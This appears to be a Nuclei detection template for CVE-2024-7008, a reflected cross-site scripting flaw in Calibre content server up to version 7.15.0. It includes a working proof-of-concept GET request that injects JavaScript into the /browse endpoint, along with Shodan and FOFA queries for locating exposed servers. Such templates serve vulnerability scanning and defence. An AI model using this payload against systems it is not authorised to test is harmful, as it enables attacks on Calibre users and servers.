nuclei-templates/http/cves/2024/CVE-2024-7008.yaml

39 lines
1.5 KiB
YAML
Raw Permalink Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2024-7008
info:
name: Calibre <= 7.15.0 - Reflected Cross-Site Scripting (XSS)
author: DhiyaneshDK
severity: medium
description: |
It is possible to inject arbitrary JavaScript code into the /browse endpoint of the Calibre content server, allowing an attacker to craft a URL that when clicked by a victim, will execute the attackers JavaScript code in the context of the victims browser. If the Calibre server is running with authentication enabled and the victim is logged in at the time, this can be used to cause the victim to perform actions on the Calibre server on behalf of the attacker.
reference:
- https://starlabs.sg/advisories/24/24-7008/
metadata:
verified: true
shodan-query: html:"Calibre"
fofa-query: "Server: calibre"
max-requeset: 1
tags: cve,cve2024,calibre,xss
http:
- raw:
- |
GET /browse/book/TEST&quot;;window.stop();alert(document.domain);%2f%2f HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- 'window.location.href = "/#book_id=TEST";window.stop();alert(document.domain);//&panel=book_details'
- type: status
status:
- 200
# digest: 490a004630440220204753a269829273bf653d6bc90e49f892dbce2ee36a361edb1e33a0537442da02203a4a9991048fd3702d95471a875fb381c0fa628e090a0f4156c8f876dae1be48:922c64590222798bb761d5b6d8e72950